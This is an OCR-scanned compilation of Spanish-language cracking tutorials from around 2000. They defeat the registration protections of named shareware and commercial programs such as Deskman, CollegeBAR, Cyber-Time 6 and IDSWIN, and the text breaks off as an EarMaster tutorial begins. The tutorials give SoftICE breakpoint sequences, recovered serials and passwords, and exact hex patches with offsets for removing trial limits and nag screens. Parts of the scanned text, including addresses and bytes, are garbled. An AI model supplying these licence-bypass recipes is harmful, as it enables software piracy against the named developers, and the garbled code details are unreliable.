saludos a toda la people de tutoriales2000. saludos a profesor x. 


saludos al l.d.a. (monofeo (gran amigo), flaco (pastero), chirda, taza, afo, solerman, nasal, peter y a todos los 
demás) 


saludos a todos los crackers del mundo. 


chao !! 
espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, 


lean muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


act mago 2000 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


introduccion 


si te gustan los juegos de ingenio, este tutorial te va a interesar. si bien tiene un sistema de protección como 
los programas anteriores, lo más dificil es encontrar la ventana para introducir los datos y el botón de aceptar. 
ultimamente me estoy encontrando con bastantes programas de este estilo, por lo que me pareció interesante 
dedicarle un tutorial. 


deskman es un utilitario simple pero efectivo, nos permite entre otras cosas bloquear mediante passwords los accesos 
directos del escritorio (muy fácilmente, haciendo drag and drop), también te permite ocultar elementos del menú 
inicio, etc.como siempre lo único que me interesó es su sistema de protección. cuando lo instalé y lo corrí, obtuve la 
siguiente ventana: 


Startup Message 


h  Deskman v2.5 - Unregistered copy - 9 Anfibia 1998-2000 
“You are permitted to try this software on your system for 30 days without any cost or obligation. Payment is required if you 
find this software to be useful or if you wish to continue using this software beyond the evaluation [trial] period. Thus, you 
ill obtain a license to use this program without restrictions. 


See help for more information. 


la acepte y llegué a esta otra ventana: 


) DO YD k Xx 


Apply — Default Config Hide Exit 


E System |] Control | Misc. | Drives | 


Disable Desktop Hide Traybar Clock 
PF Disable Taskbar FF Trap System Keys 
PF Hide Start Menu FF Hide Traybar 

TF Hide Taskbar Buttons 
TT Block System Shutdown 


Se Passyyord 


Undo Passyvord 


acá empezaron los problemas. opimí todo lo que encontré a mi paso, pero no encontré la ventana de registración. lo 
cerré, lo abrí y nada. adelanté el reloj de mi pc y nada de nada. esto me tuvo a maltraer unas cuantas noches. pensé que 
el único camino era patchearlo pero lo desensamblé con w32dasm y encontraba referencias que decían 'license code' o 
'make use of the codes licensed from... (como iba a hacer uso de los códigos provistos por.... si no tiene ventana de 
registración). debía seguir buscando. 


todo esto lo escribo en forma relajada, porque ya encontré el botón oculto. pero te puedo asegurar que cuando no 
aparecía, la cosa era muy distinta. existen infinidad de programas que complementan la protección ocultando la 
ventana de registración. me viene a la mente en estos momentos 'pretty good solitary 99', pero hay muchos más. a 
partir de ahora (perdón) te voy a quitar el placer que sentí cuando finalmente la encontré. una posibilidad sería, que te 


bajes el programa y sin seguir leyendo trates de encontrarla (al menos por un rato). por lo demás, tiene una protección 
no muy distinta a las que venimos viendo en los tutoriales anteriores. 


ves ese cuadradito con una letra d en bajo relieve , Si lo oprimis obtendrás esta ventana: 


— ron v2.5 9 Anfibia 1998 - 2000 


Shareware - 30 days to test 
Anfibia Web Site — Tech Support | 


Name + Company 


- This copy of Deskman is licensed to: 
[License Code unregistered copy 


como siempre poné tus datos, en mi caso puse 'yerba mate' y '12345678' ahora solo nos resta encontra el botón de 
aceptar. para que lea los datos debes hacer 'doble click' en la porción de la ventana que dice 'deskman' 


te aparecerá un mensaje amenazadOT.............. 


Warming! 


| Make use of codes licensed from ánfibia, only. 
The use of illegal codes is not licensed and may result in unpredictable behaviour. 


satritcneiiedó que al aceptarlo te conducirá a lo siguiente: 


» v2.5 9 Anfibia 1998 - 2000 


ce>okr de y Y Shareware - 30 days to test 
[invalid Anfibia Web Site Tech Support | 


. This copy of Deskman is licensed to: 
| nvalid unregistered copy 


bueno ya tenemos todos los elementos necesarios para crackear esta protección, es decir la hemos transformado en 
una protección normal de las tantas que ya hicimos juntos. este es el octavo tutorial por lo que no te voy a aburrir con 
los detalles. si no entendes algo debes releer los ensayos anteriores, o bién como siempre, te dejo al pie la dirrección de 
e-mail para aclarar dudas. 


entonces, llenamos con los datos,control-d, bpxhmemcpy, f5 aceptamos ( doble click en deskman ), f5 para que 
salte el tenebroso mensaje de warning! ;-), lo aceptamos y entramos en el soft-ice. desactivamos el breakpoint para 
que no moleste (bd00). presionamos f12 unas 7 veces y llegamos al deskman!code. presionamos f12 unas 5 veces 
más y a partir de allí £10 hasta alcanzar la dirección 00475153 (unas 13 veces) , allí se carga en el eax el valor de 
nuestro serial correcto. presionamos f10 una vez más y hacemos deax .en mi caso obtuve ' 130vur1g32'. todo el 
párrafo anterior fue un leve repaso, sí hiciste los programas que te dejé de práctica, éste no aporta nada nuevo más que 
lo visto al principio. 


por dudas o consultas comunicate a http://yerbamatear O yahoo.com 


espero que este tutorial te haya sido útil, nos vemos en el próximo 


yerba mate 


' todo es fácil cuando se sabe como' 


importante: lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, no como robar alguna 
propiedad. si vas a usar este programa debes comprarlo. si no fuera por los programadores de shareware 
no tendríamos con que entretenernos. 


karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: | CollegeBAR 


PROTECCION: Password... de una Base de Datos de Access camuflada. 


Descripcion: Util para preparar combinados de calidad. 


Dificultad: | Aficionado. 


DOWNLOAD : http://www.pracx.com 


Softlce 3.24, Editor Hex, Microchof Access. 


CRACKER: Arkanian FECHA: 01/11/2000 


introduccion 


un estupendo y util programa, hecho con visual basic 6.0, especialmente preparado para colarnos por la 
puerta trasera. pueden ponerle toda la seguridad del mundo, pero si se dejan lo principal al descubierto, 
¿quien nos puede culpar por aprovecharnos?. 


Herramientas: 


el programa es una puñetera base de datos de access pero sepultada en una cienaga de dll's, ocx, y otros 
ejemplares con extensiones todavía más estrafalarias. todos estos archivos lo único que hacen es proporcionar 
una interfaz, que tampoco es nada del otro mundo, y controlar todo el rollo de la ventana de registro, la 
caducidad y todas esas cosas. 


el programa completo es lento de ganas, pierde un tiempo totalmente injusticado en cargarse, deja el registro 
de windows convertido en un bebedero de patos y encima funciona como le da la gana. ¡así que estas son las 
maravillas de la programación en visual basic!, ...apañados estamos. 


al atake 


por delante 


después de configurar concienzudamente softice para meterle mano al visual basic y esperando encontrar algún tipo de 
novedad al final acabamos donde siempre. mucho visual basic y mucha historia, ...para acabar rompiendo en 
kernel!hmemepy. en fin... 


el programa viene con rutinas anti-sice, un chequeo con regmon nos muestra como busca en el registro las claves de 
softice. también viene con varios serial number "trampa" que van apareciendo en el registro eax, después de trazar 
durante bastante rato, que si los introducimos nos llevan a esta divertida ventana antes de que el programa quede 
bloqueado: 


Crack Not Sucessful 


Piracy really hurts author of software, 
Without income this program will not 
be able to be updated in the future. 

So please register, Thank pon 


porque esa es otra, trazar el programa. hay verlo para creerlo. la cantidad de vueltas arriba y abajo que damos 
simplemente para cambiar el nombre de arkanian a a.r.k.a.n.i.a.n es de juzgado de guardia. ¿hay otro camino por donde 
atacar?, ...si, se han dejado la puerta trasera abierta ... 


un vistazo al directorio del collegebar me hizo fijarme en otro archivo situado por encima del archivo msvbvm60.dll, el 
msjet35.dll 


este archivo es el .dll fundamental para que funcionen las bases de datos de microchaf, y si quieres más pistas, cada 
vez que ejecutas el programa y sale la ventana de crack not sucessful aparece en el directorio del programa un archivo 
cuyo icono con su llavecita y su tipo no ofrece lugar a dudas: ''información de bloqueo de registros de microsoft 
access". esto me pasa por no fijarme antes. 


por detras 


así que tenemos una base de datos de access por algún lado...el mejor candidato que tenemos es el collegebar.dat con 
2.150 kb de tamaño. vamos a hechar un vistazo a este archivo. lo abrimos con un editor hexadecimal y obtenemos un 
mensaje de error. no se puede abrir. 


¿el archivo de bloqueo de registro tendrá algo que ver?, por si acaso lo eliminamos ...y obtenemos otro mensaje de 
error, el archivo está siendo utilizado, pues vaya... ctrl+alt+supr y vemos que efectivamente collegebar anda todavía 
en ejecución, le damos a finalizar tarea. 


ahora si, podemos abrir el archivo collegebar.dat con el editor hexadecimal y comprobamos como a partir del quinto 
byte esta la frase standard jet db. una base de datos de access camuflada. copiamos este archivo a otro lugar del disco, 
lo renombramos como collegebar.mdb y hacemos doble click sobre él. access entra en funcionamiento y nos pide una 
contraseña. 


copyright: 
el procedimiento de hallar la contaseña de una base de datos de access lo puedes 
encontrar en los ensayos destripando access 97 de mr. blue, en el ecd. a cada cual lo 


suyo. 


como ya sabes donde consultar, abreviaremos el procedimiento y las explicaciones. access guarda las contraseñas 
encriptadas a partir del byte número 42 contando desde el pricipio del archivo. para comprobar si una base de datos 


tiene contraseña, lo que hace es cargar la base de datos y comprobar a partir de ese byte. 


si lo que encuentra corresponde a una cadena ascii de valor O, eso quiere decir que no hay contraseña. si por el 
contrario lo que encuentra es diferente de O, eso quiere decir que existe contraseña. para ello debe desencriptar esa 
parte del archivo. 


y ahí es donde vamos a meter mano nosotros. vamos a buscar en que direcciones de memoria va cargar nuestra base de 
datos y pararemos la ejecución con el bp adecuado cuando empieze a leer el byte 42. 


cerramos el archivo, nos vamos a access seleccionamos archivo, abrir base de datos, buscamos nuestro collegebar y 
antes de abrir, crtl+d y nos vamos a softice: 


bpx createfilea 

crtl+d, click en abrir, saltamos a softice, 

pulsamos f11 y vemos que eax = al (en mi caso), 

bpx readfile if *(esp+4) == 

pulsamos f5 y vemos que eax = 04154000 (en mi caso), 
be *, 

bpm 04154042 rw 

pulsamos f5, edi = 04154042, 

pulsamos f8 hasta que ebp =0, 


d 04154042, ¡alehop! , la contraseña buscada es..., luke, ..(¿skywalker?). 


con esta contraseña abrimos la base de datos en modo exclusivo, vamos a herramientas, seguridad y anulamos la 
contraseña. 


luego vemos que en la base de datos solo están cargadas las tablas, no necesitamos más. con esto, el subdirectorio 
images y un poco de habilidad nos montamos nuestra propia base de datos para bebidas sofisticadas. ¡y ocupando solo 
3 mb!. no como el programa completo que ocupa una barbaridad. 


puede quedar algo parecido a esto: 


83 Drinks1 


no dudo de vuestra habilidad con access para conseguir resultados espectaculares en cuanto a la presentación, yo solo 
soy un simple aficionado. 


guardamos en lugar seguro nuestra nueva base de datos, si te fijas en la imagen, tienes 4.060 bebidas diferentes para 
hacer, algunas rarísimas. 


después de esto, solo queda desinstalar el collegebar con toda su parafernalia de archivos .ocx, .dll's, vba's y demás 
cosas raras que lo único que hacen es ocupar sitio y que ya no necesitamos para nada. 


¡a vuestra salud! 


karpoff spanish tutor: página dedicada a la divulgación de información en castellano, sobre 


ingeniería inversa y programación. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Cyber-Time 6 (Server) 


PROTECCION: Límete de entradas a 256. Alguna Nag. 

Descripcion: Software para un Cyber Café 

Dificultad: Principiante 

DOWNLOAD: http://www. cybertimesoftware.com 

Herramientas: Softice, DeDe, Wdasm, Editor Hexa. 

CRACKER: KuaTo_ThoR FECHA: 02/11/2000 


introduccion 


muy buenas, nuevamente estoy aquí, para bien o para mal (espero que para bien) :) 


lo primero agradecer al profesor x que me recomendase este programa para hacer el tute, espero que os guste, 
será muy divertido. :-) 


bien, a la hora de instalar el programa, elegir server, ya que el paquete incluye el software del servidor y el de las 
usuarios normales. una vez instalado el programa, vamos a system administator, nos pedirá nombre y contraseña, 
son: admin y password respectivamente. entramos, y donde veamos el nombre y la contraseña los cambiamos, por 
ejemplo, dejadlo en blanco para no perder tiempo, guardamos los cambios. (la verdad es que no admite dejarlo en 
blanco, pero si vamos al archivo 'db cyber-time 6.mdb' y lo abrimos con access o un programa que pueda hacerlo, 
vamos a la tabla 'db globalinformation', y borramos lo que hay, que son nuesto nombre y contraseña, ¡¡menuda 
seguridad!! ;)) 


una cosa que no quería olvidar, en este tutorial, únicamente explico como reventar el server, la workstation os la 
dejo a vosotros, intentadlo y haced un tute, podéis preguntarme cualquier duda. 


una vez hecho esto, estamos listos para comenzar. 


al atake 


preliminares 


ejecutamos el programa, y nos aparece la siguiente ventana: 


eS 


Accounts Manager 


rr 


no sé si la ventana saldrá en el programa registrado, pero desde luego evaluation version no creo que aparezca. damos a 
ok, y nos aparece nuevamente la ventana del login. vemos que por ahí pone unregistered..., no creo que esto aparezca en 
la versión registrada. pulsamos enter, ya que la contraseña es el vacio. 


ahora estamos en la pestaña user accounts, pulsamos add, para añadir un nuevo registro. metemos los datos que 
queramos, y pulsamos save. nos aparece una ventana parecida a la anterior que nos dice que nos quedan 254 registros. 


esto es basicamente lo que tenemos que eliminar o modificar. 


si analizamos el ejecutable con algún programa como gettyp, file inspector, file analizer, veremos que nos dicen que está 
compilado en delphi, y que no está comprimido. 


haced un par de copias del ejecutable principal, y una de ellas ir desensamblandola con wdasm, porque tardará un poco, son 
2mb!!. 


ya que está el delphi, vamos a aprovechar para abrir el programa con el dede, ya sabéis, abrir y luego process. 


vamos a procedures, y vemos que se mueve por allí. lo primero que salta a nuestra vista es: evalexpired_unit, si pulsamos 

sobre ella nos aparecen a la derecha un par de eventos, que no parecen por ahora muy interesantes. si vamos a la principal, 

mainwin_unit, podremos ver que aparecen un montón de eventos, para no volvernos locos, pulsamos sobre event, para que 
se ordenen alfabéticamente. ahora podemos ver alguna cosilla interesante: 


1.- decsaves: pulsando sobre ella podemos ver dentro la frase "mumber of saves remaining =" ¿os suena? :) 


2.- getevaldata: aquí podemos ver entre otras las siguientes cadenas de exto: "evalexpired"; "cyber-time 6.0 
evaluation version. you have "; "unregistered evaluation version - not for commercial use"; interesante ¿no? 


3.- securitycheck: aunque parecía que no quedaba nada, podemos encontrar: "unregistered copy"; "registered copy" 
y nuevamente: "unregistered evaluation version - not for commercial use". ¿qué más podemos pedir? 


=== limite 255 registros ... 


podemos empezar por getevaldata. anotamos la dirección donde empieza, 5551f4, y ponemos un break en sice, 
cargandolo con symbol loader. ponemos bpx 5551f4, damos f5, vemos el programa correr... salta sice !!! vamos traceando 
con f10 buscando algo interesante, hasta encontrar algo aquí: 


:005552c6 eb11 jmp 005552d9 <- aquí saltamos 
:005552c8 e973e3eaff jmp 00403640 

:005552cd 33c0 xor eax, eax 

:005552cf a3582c5600 mov dword ptr [00562c58], eax 
:00555204 e883e7eaff call 00403a5c 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:005552c6(u) 


| 
:005552d9 833d582c560001 cmp dword ptr [00562c58], 00000001 <- comparación interesante 
:005552e0 7d41 ¡ge 00555323 <- si esmayor o igual a 1 saltamos 


| 
| una vez llegados a 5552d9, ponemos d 562c58 para ver que es lo que contiene. y vemos que contiene fe en hexa, que 

| ¿cuánto es en decimal? pués 254, es decir aquí es donde compara el número de registros que nos quedan,si es mayor o igual 
| a uno salta, si no salta la ventana de expirado. sería un buen lugar para poner un jmp en vez de un jge, pero tengo pensada 

otra cosita, jeje. vamos a ver en qué llamada que lo saca y luego la machacamos, poniendola a 255, así nos aseguramos que 


no haya errores ¿qué os parece? 


| bien, si miramos un poco más arriba, el call más cercano está en 5552b4 (ponemos un break para luego) y vemos esto: 


:005552b1 8b45f8 mov eax, dword ptr [ebp-08] 

:005552b4 e81352ebff call 0040a4cc <-call más cercano 

| :005552b9 a3582c5600 mov dword ptr [00562c58], eax <- ¿os suena 562c58? pasamos el valor de eax a él. 
:005552be 33c0 xor eax, eax 


continuemos traceando para ver que más hace ... llegamos a 55534d y nos salta una ventana diciendos los registros que 
nos quedan, cerramos la ventana, y volvemos a sice. ponemos un break sobre el call, y nos fijamos que algunos valores de 
los registros han cambiado al salir del call, concretamente eax=1. puede que nos sirva para algo o no. bueno, dejamos correr 
al programa y lo cerramos. (borrad lo breaks que ya no sean útilles) 


si volvemos a ejecutar el programa, nos saltará en 5552b4, si ponemos d eax, vemos que aparece 254, en decimal, si 
pasasemos el call, veríamos que eax tiene el valor fe, justo nuestro valor, que luego pasa a 00562c58 en la siguiente 
instrucción. como ya os he dicho lo que pasa, nos colocamos sobre el call, y nos disponemos a escribir un poco de asm, 
escribimos a eip, para meter las instrucciones en la dirección actual. metemos mov eax, ff (255) y pulsamos enter un par 
de veces. podemos ver que ahora se va a ejecutar nuestra instrucción, anotamos sus bytes: 


mov eax, fe -> b8 ff 00 00 00; 


y pulsamos f5 para ver que pasa. nos salta sice en el call de llamada a la nag, dejémosla salir por esta vez, volvemos a pulsar 
f5. y nos aparece la ventana dicendo que nos quedan 255, perfecto !!! 


| ahora hagámoslo permanente con el editor hexa. lo metemos donde lo hemos metido ahora. vamos allí con el editor hexa, y 
metemos los bytes de arriba: b8ff000000. lo metemos en 1546b4 (offset de 5552b4), guardamos los cambios y 

| probamos el programa. sale la nag con 255 registros, y si metemos otro más nos dice que quedan 254, lo cuál dice que el 
255 lo mete en su registro, es decir todo va perfecto. 


«la nag ... 
esto va a ser más corto, aunque no tan bonito ;-) 


| bien, teníamos la nag en 55534d, cargamos con symbol loader, borramos todos los breaks (bc*), y metemos bpx 55534d. 
pulsamos f5 ... y salta sice aquí: 


:0055534a 8b45ec mov eax, dword ptr [ebp-14] 
:0055534d e8aa4bfoff call 0O459efc <- aquí llama a la ventana. 
:00555352 8b45fc mov eax, dword ptr [ebp-04] 
:00555355 8b8070070000 mov eax, dword ptr [eax+-00000770] 


¿probamos a nopear la ventana? vamos a por ella, ponemos a eip, metemos 5 nops, damos f5... y arranca sin problemas, 
incluso podemos volver a meter otro registro, y nos dirá que quedan 254 otra vez. un poco cutre, pero efectivo, jeje. para 
hacerlo permanente, nuevamente cogemos el editor hexa, el offset es 15474d. 


para los que no les gusten los nops: 


bien, hay por ahí un ret, !! llamémosle !!. la dirección de un ret es 555d91 y el offset de 55534d ya lo sabéis. el resto os lo 
dejo a vosotros. 


... SAves remaining ... 


vamos a ocuparnos de esta nag, luego iremos a por el unregistered. 


en el dede, pulsamos un par de veces sobre decsaves, y nos aparece el código, vemos por ahí, "number of saves 
remaining:". esta es nuestra frase. vamos a poner un par de breaks, uno al comienzo y otro al final: 


| 
| 
| 


| 00550284 55 push ebp <--- principio 
| 00550285 8bec mov ebp, esp 


| 00550326 ba02000000 mov edx, $00000002 
| 0O5503ab eSac3bebff call 0O403f5c 
005503b0 c3 ret <--- final 


| por tanto, vamos al symbol loader, si aún tenemos breaks anteriores los borramos, y metemos esos dos, bpx 550284 y bpx 
|5503b0. el primero únicamente para ver que es lo que hace el programa por ahí, simple curiosidad. bien, damos a la ruleta, 
| esperamos, metemos un nuevo registro, ddamos a save... y salta sice. justo en el principio, que casualidad ;-) 


| continuemos, traceamos con f10, viendo que pasa por ahí, por ejemplo en 5502d6, vemos un mov eax, [00502c8], al pasarlo 
| vemos que el valor de eax pasa a ser fe (en decimal es 254). nuestra ventana tiene que estar cerca. seguimos con f10 hasta 
| que al llegar a 55037c, aquí salta la ventana. podríamos intentar machacarla aquí, pero mejor lo hacemos en su llamada 

| 'madre', seguimos, hasta que llegamos a ret, pulsamos f10, otro ret, y aparecemos aquí: 


| :0054fb99 Of8529ffFFff ¡ne O0O54fac8 

:0054fb9f 8b45fc mov eax, dword ptr [ebp-04] 

| :0054fba2 e8dd060000 call 00550284 <- esta es nuestra llamada 
| :0054fba7 33c0 xor eax, eax <- aquí aparecemos 

| :0054fba9 5a pop edx 

:0054fbaa 59 pop ecx 


| ahí está nuestra llamada, al salir de ella podemos mirar que valores de los registros han cambiado, concretamente podemos 
| ver que eax vale O (si no veis los registros, pulsad f2). así que metemos un break en el call, reiniciamos el programa, 

| metemos un nuevo registro, y ... salta sice en nuestro call. vamos a sustituirla por un mov eax, 00. metemos a eip, para 

| escribir asm en la dirección actual, metemos mov eax, 00 y pulsamos un par de veces enter, vemos que el call se ha 

| transformado en un mov, pulsamos f5 para volver a windows ... y el programa va de maravilla, prueba superada :-) 


| para hacer los cambios permanentes, utilizamos el editor hexa. mov eax, 00 -> b800000000. el offset es: ... bueno, 
| buscadlo vosotros, que ya deberíais saber :) 


| nota: fijaos que mov eax, ttxxyyzz en bytes siempre se escribe igual, comenzando por b8, y a continuación el valor 
| cambiando los bytes de orden, así: zzyyxxtt. es decir un mov eax, ttxxyyzz -> b8zzyyxxtt 


Unregistered. 


| eso es, queda el mensaje de unregistered que aparece al arrancar el programa. como vimos en el dede, aparece al 
| menos en dos sitios. si miramos en wdasm, veremos que sólo son esos dos sitios. 


la que aparece en getevaldata es la que a nosotros nos intersa.y en securitycheck aparece registered copy. 


| debemos recordar que es lo que queremos, únicamente nos queda eliminar una frase, y cambiarla por otra. esto con un 
| editor hexadecimal, está hecho, sólo tenéis que buscar la frase (como ansi) y modificarla por lo que queráis. 


| pero podemos hacerlo cambiando una cosa, veamos donde aparecen ambas frases: 
|* possible string reference to: "registered copy" 
| 00555b6a bac45d5500 mov edx, $00555dc4 


| * possible string reference to: "unregistered evaluation version - n 
|| ot for commercial use" 


Ñ 
|0055535b ba18545500 mov edx, $00555418 


|los números resaltados, son las direcciones de ambas cadenas, ¿qué sucede si cambiamos 555418 por 555dc4? que 
| aparecerá la frase registered copy en lugar de unregistered... 


cogemos el offset de 55535b que es 15475b, vamos al editor hexa, y cambiamos ba18545500 por bac45d5500 
| (00555dc4), bonito colorido ;-), recordad que hay que invertir el orden al meter los bytes. 


finalizando 


creo que con esto ya hemos hecho una buena simulación de registro del programa ¿no? si alguien logra hacerlo mejor 
que me lo mande. 


bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna 
pregunta no dudéis en decírmelo. espero que os haya resultado útil este tute. no olvidéis que nuestro objetivo sólo es 
aprender. sin contar con la diversión que esto supone por supuesto ;-)) 


aprovecho para mandar un saludo a todos los que me habéis escrito como cosecuencia directa de mis tutes, en especial para 
nandois y para javier. y como siempre un gran saludo para todos los miembros de [k-for] y de tutoriales 2000. parece la 
despedida de un concurso de la tele, jeje. 


hasta la próxima... 
«roza » 


mi correo: kuato_thortdhotmail. com 


la página de [k-for]: http: //pagina.de/kfor 


«orar » 


karpotff spanish tutor: 


pagina dedicada a la dibulgacion de informacion en castellano, 
ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: IDSWIN WIN 95/98/NT 


PROTECCION: Licencia/Serial Number. 

Descripcion: Programa de Contabilidad y Gestión Multiempresa 
Dificultad: Novato, Facililla, Media, ETC 

INFORMACION: http://distrito.com/ids 

Herramientas: Numega SoftICE v.4.05, GetTyp v.2.06, Dede v.2.34 
CRACKER: +Erfser FECHA: 30/10/2000 


introduccion | 


el prorama ''no es necesario" para seguir este tutorial. mi intención es solamenente enseñar esquemas de protección 
genéricos empleados por los programadores de aplicaciones comerciales. se trata de software comercial "difícilmente" 
disponible en la red si sabes como buscar. aunque podemos conseguir una versión ''demo"' a través de las distintas técnicas 
de "ingeniería social" este no es lugar ni el momento de explicar las distintas técnicas, de este "maravilloso-arte". en mis 
archivos personales de software ''solo con fines educativos:)'' dispongo de la versión 97.1 para win95, programa de 
contabilidad y gestión multiempresa, realizado por la empresa ids - informática del segura, s.l. en su página web, podemos 
leer algo como esto : 'este programa es uno de los siete mejores de españa, según la revista pcmedia'' y me pregunto : 
nos podemos fiar de la opinión de los maravillosos técnicos de la revista pemedia? 


en este caso, aunque parezca extraño es un programa bastante bueno, sencillo e intuitivo, desde aqui mis "felicitaciones" a los 
programadores por su aplicación, aunque un suspenso en su rútina de protección. 


primeramente necesitaremos tener las ideas muy claras de como atakar a este programa, realizado en delphi (q:¿cómo 
sabemos en que lenguaje esta realizado?, a: gettyp). una vez sabiendo en que lenguaje podemos descompilarlo, en este 
caso, empleamos otra maravillosa utilidad llamada, dede 3.45 ( o sino generamos un listado muerto con el win32dasm ). 


la información que obtendremos la podemos utilizar más tarde, para realizar una segunda aproximación, es decir, realizar un 
keymaker (o generador de llaves) para el programa. 


aaaaaaaltooo00000!!!!!!! 


podiamos seguir hablando y hablando, donde realiza el salto (jne,je,jz,jnz...) o hace la comparación en esta dirección, la 
rútina de generación es así, etc... pero por falta de tiempo y "ganas" solo voy a dedicarme a encontrar el n*serie válido, 
aunque quien sabe, algun día ... ;) 


sólo necesitamos paciencia, materia gris, un paquete de tabaco, y un vodka-naranja, para averiguar el n“serie válido para la 
licencia. 


instalamos el programa idswin versión ''demo"', nos creara una serie de carpetas, el programa ejecutable lo encontramos en 
la carpeta siguiente: WdswinigeneralN 
ManNte.eXe <onommnm==- programa "victima" 


el programa nos generara una licencia determinada dependiendo de las caracteristicas internas de nuestra máquina (nombre 
de pc, tipo de procesador, etc... supongo:) 


en este caso licencia = dsisrvuw 


al atake 


primera aproximación : arrancamos nuestra "victima" con la herramienta apispy32 v2.4 para averiguar la api a establecer 
el bp (breakpoint), en nuestro caso es (como en otros tantos ;)) 


$ APIS32 A A ES 
Examining Application 


[C-IDSWINYGENERAL mante. exe ES 
Command Line Arguments: | 


Follow API functions are spied 


StartUp 
[Y OnTop  J” Pause 


ADVAPI32: RegOpenKeyá [ HANDLE, LPSTR, LPDATA ] 

ADVAPI32 : RegOpenKeyExó [ HÁNDLE, LPSTR, DWORD, DWORD, LPDATA ] 
ADVAPI32: RegOpenKeyExw [ HANDLE, LPWSTR, DWORD, DWORD, LPDATA ] 
ADWAPI32: RegDpenKeyw' [ HANDLE, LPWSTR, LPDATA ] 

KERNEL32: _hread [ HANDLE, LPDATA, DWORD ] 

KERNEL32: _hwrite [ HANDLE, LPSTR, DWORD ] 

KERNEL32:_lclose [HANDLE ] 

KERNEL32:_lcreat [LPSTR, DWDAD ] 

KERNEL32:_llseek [ HANDLE, DWORD, DWDRD ] 

KERNEL32:_lopen [LPSTR, DWORD ] 


KERNEL32 :_lread [ HANDLE, LPDATA, DWORD ] Add 
Del 


KERNEL32: _lwrite [HáNDLE, LPSTR, DWORD ] 
KERNEL32: CreateFileá [LPSTR, DWORD, DWORD, LPDATA, DWORD, DWORD, HANE 
KERNEI22> PreateFilemanninná [HANA FE 1PRNATA MaÁnARn MadaAn MnAN 1 PST 


Ej APIS32 y. 2.4 - Registered to +Er(Mser 


0042606C:CreatellindowExA = 640 

00426067: CreatellindowExA (DWORD: 00000000,LPSTR:O0A3FCES: "TBitBtn",LPSTR:( 
0042606C:CreatellindowExA = 644 

00426067: CreatellindowExA (DWORD: 00000000,LPSTR:O0ASFCES: "TBitBtn",LPSTR:( 
0042606C:CreatellindowExA = 648 

00426067: CreatelindowExA (DWORD: 00000200,LPSTR:004A3FCE4: "TEdit" ,LPSTR:00( 
0042606C:CreatellindowExA = 640 

00426067: CreatelindowExA (DWORD: 00010000,LPSTR:O0ASFCFC: "TPanel” ,LPSTR: 0: 
0042606C:CreatellindowExA = 66€ T 


f ¿| IDSWIN! GENERAL mante. exe 
Options 
| Save LOG Clear | Exit | 


(+) createwindowexa (user32.dll) 


Examining Module 


partiendo de que tenemos residente el softice en nuestro sistema, ejecutamos la "victima" nos aparece una pantalla : 


Numero de Usuario: LALO | numer EI] 
o 


A d 
NA ccedera en modo demo 


antes de pulsar el boton [aceptar] activamos el softice (ctrl+d) y establecemos el breakpoint, 'bpx createwindowexa' 
(porque de lo contrario nos aparecera el aviso 'accedera en modo demo""), regresamos a nuestra "victima" pulsando de 
nuevo (ctrl+d), ahora es el momento que debemos pulsar el boton [aceptar]. pantallazo y aparecemos dentro del softice 
pulsamos la tecla de función [£12] para que nos salte a la rutina del programa que llama a esta api. 


veremos algo asi: 


eax=000008ec ebx=0023f524 ecx=80004f40 edx=80005260 esi=0139b5ac 
edi=0139b878  ebp=00a3f4d8  esp=00a3f494  eip=0042606c  odiszapce 
es=017f ds=0187 ss=0187 es=0187 fs=12bf gs=0000 ds:0139b678=000008ec 
*eax=21c 

*ebx=0 

*“ecx=80005260 

*esi=468d2c 

017£:00426067  eS340efeff call user32!createwindowexa 

0171£:0042606c S986cc000000 mov [esi+000000cc], eax <---- aquí aparecemos;) 


017f:00426072  5e pop esi 
017f:00426073 5b pop ebx 
017f:00426074  c3 ret 


visualizamos el registro esi pulsando en la pantalla de registros del softice con el botón derecho del ratón y seleccionando - 
display, avanzamos sobre la pantalla de datos, bien con el ratón o pulsando [repág] hasta ver algo curioso, como esto: 


e A A 
0187:01398efc 3036 3137 3233 3234 0037 0000 00la 0000  607132427.........cuc.moo.o 
0187:01398e0c 0001 0000 0009 0000 3a43 495c 5344 4957 — ....... co didswWi.........oo. 
0187:01398elc 004e 0139 0026 0000 7lac 0041 44b0 0042  n.9.%....qa..db.......... 
0187:01398e2c b5ac 0139 b8d8 0139 0000 0000 0008 S000 A A 
0187:01398e3c 0060 0000 0000 0000 0012 0000 0001 0000 — PT oonnnnnnnnninocinonnmo........ 
0187:01398e4c 0003 0000 504f 0035 8f54 0139 8f54 0139  ....op5.t.9.t.9....o..... 
0187:01398e5c 0010 0000 0010 0000 001b 0000 0001 0000 — .nnnonnnnnnnnonccnnonnocooocooo00... 


0187:01398e6c 000b 0000 4452 424e 5348 4845 4f53 0051  ....rdnrhsehsoq. 


pues ya esta, ya tenemos nuestro n/serie=rdnrhsehsoq para la licencia=dsisrvuw que nos genera el programa mante.exe, 
fácil no!!! 


un saludo! 


+erOser'2000 
for the new millennium 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 
ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


EarMaster Pro 4.0 


Versión de Evaluación (25 días) Nombre/N” de Serie y Nag inicial 


Simular estar registrado 


Shareware Educativo (Entrenamiento del oído musical) 
Principiante 


http: //www.earmaster.com 


SoftICE 4.x, RegFix, Editor Hexadecimal, W32Dasm (opcional) 
frantic FECHA: 01/11/2000 


introduccion 


a este programa creo que merece la pena dedicarle unos minutos para conocerlo. es para el aprendizaje musical 
práctico, para trabajar el oído. no di con él por casualidad, sino que lo hallé porque suelo usar ese tipo de software 
mientras las condiciones de evaluación lo permiten... y ya que lo tenía, se me ocurrió analizar, en la medida de mis 
